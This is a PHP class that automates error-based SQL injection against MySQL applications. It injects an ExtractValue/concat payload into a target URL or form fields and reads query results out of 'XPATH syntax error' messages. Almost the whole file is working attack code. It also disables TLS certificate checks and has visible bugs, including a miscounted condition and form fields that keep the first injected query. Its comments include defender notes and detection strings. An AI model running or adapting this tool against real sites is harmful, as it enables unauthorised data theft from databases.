
<?php
// Remove PHP's execution time limit for this script: without strict_types the
// boolean false is coerced to 0, and 0 means "no limit".
set_time_limit(false);
/**
 * Client for error-based SQL injection against MySQL, as shown on this page.
 *
 * It substitutes an SQL fragment for the literal placeholder {sql} in the URL
 * and in the POST fields, sends the request with cURL and reads the value back
 * out of the "XPATH syntax error" message found in the response body.
 *
 * Defender notes: the technique depends on two flaws in the target
 * application: request input concatenated into an SQL statement, and the
 * database error text being returned to the client. Parameterised queries
 * remove the first; generic error pages remove the channel this class reads
 * from. The request-side string "ExtractValue(1,concat(0x3a," and the
 * response-side string "XPATH syntax error" are literals in this code and can
 * serve as WAF and log detection patterns.
 */
class SQLInjectionMySQLDump {
// $ch: cURL handle created in run(); $postparams: POST fields; $url: target URL.
// $data is initialised to '' and is not read by any method in this class.
protected $ch, $postparams = array(), $url, $data = '';
/**
 * Stores the POST fields to send with every request.
 *
 * @param mixed $params Accepted only when it is a non-empty array.
 * @return $this|false $this for chaining, false when $params is rejected.
 */
public function setPOST($params) {
if(is_array($params) && count($params) > 0) {
$this->postparams = $params;
return $this;
}
return false;
}
/**
 * Stores the target URL.
 *
 * The only validation is that parse_url() yields a non-empty scheme and host;
 * the scheme itself is not restricted to http/https.
 *
 * @param string $url
 * @return $this|false $this for chaining, false when scheme or host is missing.
 */
public function setURL($url) {
$info = parse_url($url);
if(!empty($info['scheme']) && !empty($info['host'])) {
$this->url = $url;
return $this;
}
return false;
}
/**
 * Creates the cURL handle and sends one fixed test query, echoing the result.
 *
 * No User-Agent or timeout option is set on the handle in this method.
 *
 * @param mixed $filename Not used anywhere in this method.
 */
public function run($filename = false) {
$this->ch = curl_init();
// Return the response body from curl_exec() instead of printing it.
curl_setopt($this->ch, CURLOPT_RETURNTRANSFER, true);
// NOTE(review): for https URLs peer certificate verification is switched off,
// so the server's identity is not checked and responses can be altered in transit.
if(preg_match('/^https/', $this->url))
curl_setopt($this->ch, CURLOPT_SSL_VERIFYPEER, false);
// The literal is 52 characters, longer than the 31-character window used by
// get(), so reading it back takes more than one request.
echo $this->get("SELECT 'QWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm' LIMIT 1");
}
/**
 * Reads the result of $sql in 31-character windows using MID(expr, start, 31).
 *
 * The loop stops at the first window that is not exactly 31 characters long,
 * or once $start reaches 100, so it issues at most four requests and returns
 * at most 124 characters. request() returns false when nothing was captured;
 * that case also ends the loop, so a failed request and the end of the data
 * look the same to the caller.
 *
 * @param string $sql Expression whose result is read back.
 * @return string Concatenation of the captured windows.
 */
protected function get($sql) {
$str = '';
$start = 1;
do {
// presumably 31 is sized to what fits in the error message text - TODO confirm
$t = 'MID(('.$sql.'),'.$start.',31)';
$nstr = $this->request($t);
// Prints every fragment sent and every value captured to standard output.
echo $t."\n$nstr\n"; //debug
$str .= $nstr;
$start += 31;
if(strlen($nstr) != 31)
break;
}while($start < 100); //with while(true) this hangs, damn it :D there is a bug somewhere. I'm getting kind of tired
return $str;
}
/**
 * Sends one request carrying $sql wrapped in the ExtractValue()/concat()
 * expression and returns the text captured from the error message.
 *
 * @param string $sql Fragment placed inside the wrapper expression.
 * @return string|false Text captured between "XPATH syntax error: ':" and the
 *                      next single quote, or false when the response body
 *                      contains no such message.
 */
protected function request($sql) {
$ssql = 'or(ExtractValue(1,concat(0x3a,('; //start sql inj query
$esql = '))))='; //end sql inj query
$query = $ssql.$sql.$esql; //sql inj query
// The query is inserted into the URL as-is wherever the {sql} placeholder appears.
curl_setopt($this->ch, CURLOPT_URL, str_replace('{sql}', $query, $this->url));
if(count($this->postparams > 0)) {
foreach($this->postparams as $k => $v)
$this->postparams[$k] = str_replace('{sql}', $query, $v);
curl_setopt($this->ch, CURLOPT_POST, true);
// An array passed to CURLOPT_POSTFIELDS is sent as multipart/form-data.
curl_setopt($this->ch, CURLOPT_POSTFIELDS, $this->postparams);
}
$res = curl_exec($this->ch);
if(count($this->postparams > 0))
curl_setopt($this->ch, CURLOPT_POST, false);
// The value is taken from the database error text echoed in the response; an
// application that does not return that text gives this method nothing to match.
preg_match('/XPATH syntax error\: \'\:(.*?)\'/', $res, $data);
return isset($data[1]) ? $data[1] : false;
}
}